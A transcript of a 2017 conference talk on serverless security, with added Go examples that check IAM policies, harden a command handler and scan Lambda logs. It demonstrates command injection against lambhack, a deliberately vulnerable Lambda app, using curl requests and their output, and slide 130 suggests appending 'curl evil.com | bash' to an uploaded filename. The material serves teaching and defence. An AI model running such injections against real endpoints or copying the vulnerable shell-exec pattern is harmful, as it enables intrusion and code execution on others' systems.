serverless security at lascon 2017
TRANSCRIPT
- 1. LASCON 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS JAMES WICKETT
- 2. Don't worry, this is not a thinly veiled vendor pitch.
- 3. WANT THE SLIDES RIGHT NOW? Send an email to [email protected]
- 4. JAMES WICKETT: HEAD OF RESEARCH AT SIGNAL SCIENCES; DEVOPS DAYS AUSTIN ORGANIZER; AUTHOR OF DEVOPS FUNDAMENTALS AT LYNDA.COM; BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
- 5. CONCLUSION (1 OF 2): SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION. NEW SERVERLESS PATTERNS ARE JUST EMERGING. SECURITY WITH SERVERLESS IS EASIER. SECURITY WITH SERVERLESS IS HARDER.
- 6. CONCLUSION (2 OF 2): FOUR KEY AREAS APPLY TO SERVERLESS SECURITY: SOFTWARE SUPPLY CHAIN SECURITY, DELIVERY PIPELINE SECURITY, DATA FLOW SECURITY, ATTACK DETECTION. LAMBHACK! A VERY VULNERABLE LAMBDA STACK; OPEN SOURCE PROJECT AT GITHUB.COM/WICKETT/LAMBHACK
- 7. WHAT IS SERVERLESS?
- 8. MISCONCEPTIONS
- 9. IT'S MARKETING (CLOUD REBRANDED)
- 10. SERVERLESS == NO SERVERS
- 11. SERVERLESS == BACKEND AS A SERVICE
- 12. SERVERLESS == PLATFORM AS A SERVICE
- 13. TK: ADRIANCO QUOTE
- 14. SO, WHAT IS SERVERLESS?
- 15. http://martinfowler.com/articles/serverless.html @MIKEBROBERTS
- 17. HISTORY OF SERVERLESS: 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES. LATE 2014 - AWS LAUNCHED LAMBDA. JULY 2015 - AWS LAUNCHED API GATEWAY. OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA. 2015 TO PRESENT - FRAMEWORKS FORMING. 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED. 2016 - SERVERLESS CONFERENCES STARTED.
- 18. (chart: Hardware, VMs and Serverless plotted against Waste and Value) Inspiration from @adrianco
- 19. Decomposed Microservice Architecture
- 20. WHAT CAN WE SAY IS SERVERLESS?
- 21. SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)
- 22. CONTAINERS ON DEMAND
- 23. SERVERLESS IS (NO MANAGEMENT OF) SERVERS
- 24. SERVERLESS IS SERVICEFULL
- 25. SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
- 26. "If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
- 27. THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
- 28. SERVERLESS WILL COMPLETELY DISRUPT THE CONTAINER MARKET IN ONE, MAYBE TWO YEARS.
- 29. SERVERLESS DEFINITION: Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
- 30. SO, WHAT ARE THE UPSIDES?
- 31. SCALING BUILT IN
- 32. PAY FOR WHAT YOU USE IN 100MS INCREMENTS
- 33. WITH SERVERLESS, SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
- 34. SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
- 35. YOU CAN SKIP DOCKERING ALL THE THINGS!
- 36. GREAT, WHAT'S THE CATCH?
- 37. Ops burden to rationalize serverless model @patrickdebois
- 39. VENDOR LOCK-IN
- 40. MONITORING
- 41. https://speakerdeck.com/smithclay/faas-measurement-fundamentals
- 43. LOGGING
- 44. RELIABILITY
- 45. SERVERLESS DEAL KILLERS (MAYBE?): APP NEEDS LARGE LOCAL DISK SPACE; LONG RUNNING JOBS; BIG I/O TASKS; LATENCY SENSITIVE REQUESTS THAT CAN'T WAIT FOR THE COLD-STARTUP TIME
- 46. SERVERLESS USE CASES
- 47. MESSAGE PROCESSING (http://martinfowler.com/articles/serverless.html)
- 48. API GATEWAY (http://martinfowler.com/articles/serverless.html)
- 49. WEB APPLICATIONS
- 50. MORE SERVERLESS USE CASES: CI/CD, auth, wordpress, scraper, event ingestion, chatbots, load testing
- 51. Security
- 52. LET'S TRY A SAMPLE APPLICATION IN AWS
- 53. STEP 1: PICK A FRAMEWORK: SERVERLESS, APEX, GO SPARTA, KAPPA
- 55. GO SPARTA: GOLANG! AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY. SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM. GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES.
- 56. GO SPARTA INCLUDES: CLOUDWATCH EVENTS AND LOGS; DYNAMODB, KINESIS, S3; SES, SNS; API GATEWAY CREATION
- 57. STEP 2: IDEA! BUILD A WORD CLOUD GENERATOR, ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES. RETURN JSON WITH COUNTS OF WORDS IN TEXT. KEEP IT SIMPLE.
- 58. STEP 3: DESIGN AND ARCHITECTURE (USING GO SPARTA FOR THE FRAMEWORK): LAMBDA, S3, API GATEWAY
- 60. STEP 4: WRITE THE HANDLER
- 61. STEP 5: SETUP API GATEWAY
- 62. STEP 6: SET THE CONFIG DETAILS
- 63. STEP 7: PROVISION YOUR APP!
- 64. STEP 8: SETUP STRICT IAM POLICIES
- 65. STEP 9: GIVE UP AND SET VERY BAD IAM POLICIES, PROMISE TO FIX LATER
- 66. STEP 10: PROVISION YOUR APP!
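Step 9 is where many first serverless deployments end up, so a pipeline check that fails the build on wildcard grants is worth having before step 10. The following is an added example, not code from the talk or from Go Sparta: both policy documents are constructed, the function names are my own, and the parser assumes the Statement element is a JSON array (IAM also accepts a single object there).

```go
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// stringList accepts IAM's convention of either one string or a list of strings.
type stringList []string
func (s *stringList) UnmarshalJSON(b []byte) error {
	var one string
	if json.Unmarshal(b, &one) == nil {
		*s = stringList{one}
		return nil
	}
	return json.Unmarshal(b, (*[]string)(s))
}

type statement struct {
	Effect           string
	Action, Resource stringList
}

// wildcardFindings lists every Allow statement that grants all actions ("*"),
// all actions of one service ("s3:*"), or applies to every resource ("*").
func wildcardFindings(doc string) ([]string, error) {
	var p struct{ Statement []statement } // assumes Statement is a JSON array
	if err := json.Unmarshal([]byte(doc), &p); err != nil {
		return nil, err
	}
	var out []string
	for i, st := range p.Statement {
		for _, v := range append(append([]string{}, st.Action...), st.Resource...) {
			if st.Effect == "Allow" && (v == "*" || strings.HasSuffix(v, ":*")) {
				out = append(out, fmt.Sprintf("statement %d: wildcard %q", i, v))
			}
		}
	}
	return out, nil
}

// Constructed policies, not from the talk: the "step 9" shortcut and a
// least-privilege policy for a function that only reads one bucket.
const stepNinePolicy = `{"Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}`
const strictPolicy = `{"Statement":[{"Effect":"Allow","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::EXAMPLE-BUCKET/*"}]}`
func main() {
	fmt.Println(wildcardFindings(stepNinePolicy)) // two findings for statement 0
	fmt.Println(wildcardFindings(strictPolicy))   // none
}
```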
- 67. APP IN AWS CONSOLE
- 68. TEST LAMBDA EXEC IN CONSOLE: FIRST RUN OF 343MS
- 69. SECOND RUN ONLY TOOK 84MS
- 70. API GATEWAY IN CONSOLE
- 71. API GATEWAY EXECUTION IN CONSOLE
- 72. RETURNED JSON
- 73. MONITORING LAMBDA IN CONSOLE
- 74. OVERALL SERVERLESS EXPERIENCE: YOU NEED A FRAMEWORK OR YOU DIE. WHY IS IAM SO HAAARRDD? WOW! I HAVE A FULLY ELASTIC, FAST API RUNNING ON THE INTERNET FOR BASICALLY NO COST. THIS IS GOING TO BE HUGE!
- 75. IS SECURITY READY FOR SERVERLESS?
- 77. SECURITY
- 78. "many security teams work with a worldview where their goal is to inhibit change as much as possible"
- 79. OLD PATH VS. NEW PATH: Embrace Secrecy vs. Create Feedback Loops; Just Pass Audit! vs. Compliance adds Value; Enforce Stability vs. Create Chaos; Build a Wall vs. Zero Trust Networks; Slow Validation vs. Fast and Non-blocking; Certainty Testing vs. Adversity Testing; Test when Done vs. Shift Left; Process Driven vs. The Paved Road
- 81. FOUR AREAS OF SERVERLESS SECURITY: SECURE SOFTWARE SUPPLY CHAIN; DELIVERY PIPELINE; DATA FLOW SECURITY; ATTACK DETECTION
- 82. source: @devsecops
- 83. SURFACE AREA REDUCTION: THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW. A CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE.
- 84. SURFACE AREA EXPANSION: TLS CONTROL TO THE PROVIDER; ROUTING CONTROL TO THE PROVIDER; CONSUMPTION OF THIRD PARTY SERVICES; IAM ROLES AND POLICY CONFUSION
- 85. SSL / TLS FROM THE PROVIDER
- 86. OLD WAY vs. NEW WAY
- 87. ROUTING FROM THE PROVIDER
- 88. ROUTING THE OLD WAY
- 89. ROUTING THE NEW WAY
- 90. SERVICE AND 3RD PARTY EXPANSION: Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
- 91. IAM ROLES AND POLICIES: https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
- 92. Recommendation: Use a third-party service to monitor for provider config changes
- 93. USE GOOD HYGIENE WITH YOUR PROVIDER: DISABLE ROOT ACCESS KEYS; MANAGE USERS WITH PROFILES; SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM; SECURE KEYS IN DEV SYSTEM; USE PROVIDER MFA
- 94. DELIVERY PIPELINE SECURITY
- 96. UNIT TESTING
- 97. EASIER TO MOCK vs. HARDER TO MOCK
- 98. UNIT TESTING EVEN MORE CRITICAL, AS INTEGRATION TESTING IN DEV IS HARDER
- 99. INTEGRATION TESTING: USE OF A STAGING OR PRE-PROD ENV; END TO END SYNTHETIC INTEGRATION TESTS; ALL THE USUAL SUSPECTS
- 100. CONFIGURATION IS PART OF DELIVERY
- 101. GOOD PIPELINE PRACTICES: ONLY DEV KEYS CAN PUSH TO DEV; ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD; INTEGRATION TESTS MUST PASS IN THIS ENV; SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION; ALLOW PUSH TO PROD ONLY BY DEPLOY SYSTEM
- 102. RECOMMENDED SECURITY TESTING TOOLS: BDD-SECURITY - GITHUB.COM/CONTINUUMSECURITY/BDD-SECURITY; GAUNTLT - GAUNTLT.ORG, GITHUB.COM/GAUNTLT/GAUNTLT; DOCKER
- 103. GAUNTLT WORKSHOP IN 9 EXAMPLES: http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
- 104. DATA FLOW: DEVELOPMENT - DATA FLOW DIAGRAMS, THREAT MODELING; RUNTIME - LOGGING, CUSTOM MONITORS/METRICS
- 105. "Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
- 106. DATA FLOW SECURITY: SPOOFING CONSUMED RESOURCES; DENIAL OF SERVICE; TIMEOUTS; EXECUTION RESTRICTIONS FOR RESOURCES; CAPACITY ISSUES
- 107. ATTACK DETECTION
- 108. DOES APPLICATION SECURITY STILL MATTER?
- 109. https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
- 111. APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
- 112. INSPIRED BY ALL THE GOATS
- 114. INTRODUCING LAMBHACK: SERVERLESS HAS A FALSE SENSE OF SECURITY. API PROXY LAYER THING PROTECTS ME, RIGHT? ;) WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS. A VULNERABLE LAMBDA + API GATEWAY STACK, BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS.
- 116. GITHUB.COM/WICKETT/LAMBHACK: A VULNERABLE LAMBDA + API GATEWAY STACK. OPEN SOURCE, MIT LICENSED. INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING. MORE WORK NEEDED; PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP.
- 117. "lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here."
- 119. WHY IS THIS BAD? `command := lambdaEvent.QueryParams["args"]` followed by `output := runner.Run(command)`
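To make the contrast concrete, here is an added example (not lambhack's own code) of the slide's pattern beside a hardened handler: the hardened version never hands the query string to a shell; it accepts only an operation name from a fixed table and runs the fixed argv that name maps to. The `op` parameter, the `allowedOps` table and the function names are my own assumptions.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
)

// The lambhack pattern from the slide, kept only for contrast: whatever arrives in
// the "args" query parameter becomes a shell command line, so "uname -a; sleep 1"
// runs both commands. The API Gateway in front of the function does not prevent this.
func vulnerableRun(queryParams map[string]string) ([]byte, error) {
	command := queryParams["args"]
	return exec.Command("/bin/sh", "-c", command).CombinedOutput()
}

// Hardened form (a suggested rewrite, not lambhack code): the client may only name
// an operation from a fixed table; each maps to a fixed argv that runs without a
// shell, so ";", "|" and friends never reach an interpreter.
var allowedOps = map[string][]string{
	"kernel": {"uname", "-r"},
	"tmpdir": {"ls", "-la", "/tmp"},
}
var opNamePattern = regexp.MustCompile(`^[a-z]{1,16}$`)

// resolveOp validates the "op" parameter and returns the fixed argv to execute.
func resolveOp(queryParams map[string]string) ([]string, error) {
	op := queryParams["op"]
	if !opNamePattern.MatchString(op) {
		return nil, fmt.Errorf("rejected op %q: not a plain lowercase name", op)
	}
	argv, ok := allowedOps[op]
	if !ok {
		return nil, fmt.Errorf("rejected op %q: not in the allow list", op)
	}
	return argv, nil
}

func hardenedRun(queryParams map[string]string) ([]byte, error) {
	argv, err := resolveOp(queryParams)
	if err != nil {
		return nil, err // log it and answer 400; nothing is executed
	}
	return exec.Command(argv[0], argv[1:]...).CombinedOutput()
}

func main() {
	_, err := hardenedRun(map[string]string{"op": "uname -a; sleep 1"})
	fmt.Println(err) // rejected op "uname -a; sleep 1": not a plain lowercase name
}
```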
- 120. With command execution available to us in lambhack, we can poke around the container a bit
- 121. UNAME -A: `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"` > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- 122. CAT /PROC/VERSION: `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"` > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
- 123. LET'S LOOK IN /TMP: `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"` > total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
- 124. LAMBDA REUSE IN ACTION! `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"` then `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"` then `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"` > Sparta.lambda.amd64 wickettfile
- 125. WHICH CURL: `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"` > /usr/bin/curl
- 126. GOT PROXY? `$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"` > (the HTML of the example.com page comes back; with the markup and stylesheet stripped it reads: "Example Domain. This domain is established to be used for illustrative examples in documents. You may use this domain in examples without prior coordination or asking for permission. More information...")
- 127. FUTURE OF LAMBHACK: HELP NEEDED. ADD XSS AND OTHER ATTACKS; ADD AUTH VECTORS AND EXAMPLES; NEEDS A UI PLEASE! PULL REQUESTS ACCEPTED :)
- 128. APPSEC THOUGHTS: LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO. MONITORING/LOGGING PLAYS A KEY ROLE HERE: DETECT LONGER RUN TIMES, HIGHER ERROR RATE OCCURRENCES, DATA INGESTION. LOG ACTIONS OF LAMBDAS.
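As an added example (not from the talk), the "detect longer run times" idea applied to the REPORT lines Lambda writes to CloudWatch Logs after every invocation: a function that normally finishes in about 80 ms and suddenly takes over a second, as it would with a `;+sleep+1` suffix injected, stands out immediately. The log lines are constructed, and the timeout line layout and the 500 ms threshold are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
)

// Lambda writes one REPORT line per invocation to CloudWatch Logs; the first
// pattern pulls the request id and measured duration from it. The second matches
// the timeout line the runtime logs when a function hits its configured limit.
var (
	reportPattern  = regexp.MustCompile(`^REPORT RequestId: (\S+)\s+Duration: ([0-9.]+) ms`)
	timeoutPattern = regexp.MustCompile(`^\S+ (\S+) Task timed out after`)
)

type finding struct{ RequestID, Reason string }

// scanReports flags invocations that ran longer than maxMs plus every timeout.
// This is the slide's "detect longer run times": a function that normally
// finishes in ~80 ms and suddenly needs over a second deserves a look.
func scanReports(lines []string, maxMs float64) []finding {
	var out []finding
	for _, line := range lines {
		if m := reportPattern.FindStringSubmatch(line); m != nil {
			if ms, err := strconv.ParseFloat(m[2], 64); err == nil && ms > maxMs {
				out = append(out, finding{m[1], fmt.Sprintf("duration %.0f ms exceeds %.0f ms", ms, maxMs)})
			}
		} else if tm := timeoutPattern.FindStringSubmatch(line); tm != nil {
			out = append(out, finding{tm[1], "task timed out"})
		}
	}
	return out
}

// Constructed sample lines, not captured from the talk's demo. The second and
// third invocations show the kind of jump a "...;+sleep+1" suffix produces.
var sampleLog = []string{
	"REPORT RequestId: 1a2b Duration: 84.12 ms Billed Duration: 100 ms Memory Size: 128 MB Max Memory Used: 30 MB",
	"REPORT RequestId: 3c4d Duration: 1092.55 ms Billed Duration: 1100 ms Memory Size: 128 MB Max Memory Used: 31 MB",
	"REPORT RequestId: 5e6f Duration: 1088.01 ms Billed Duration: 1100 ms Memory Size: 128 MB Max Memory Used: 31 MB",
	"2017-10-19T10:00:04Z 7a8b Task timed out after 3.00 seconds",
}

func main() {
	for _, f := range scanReports(sampleLog, 500) {
		fmt.Printf("%s: %s\n", f.RequestID, f.Reason)
	}
}
```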
- 129. APPLICATION SECURITY IS STILL RELEVANT
- 130. TYPES OF ATTACKS: New surface area, similar appsec problems: Command Exec, XSS, Injection Attacks. Try new things, e.g. appending curl evil.com | bash or alert(1) to a filename you upload on s3
- 131. DEFENSE: LOGGING, EMITTING EVENTS; USAGE METRICS; VANDIUM (SQLI) WRAPPER; CONTENT SECURITY POLICY (CSP); API GATEWAYS ARE A GOOD PLACE TO ADD DEFENSE; MORE THINGS NEED TO BE DONE HERE
- 132. FINAL THOUGHT: Development in serverless is easier than ever, attracting new developers to web development; as a result, application security will see a rise.
- 136. WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]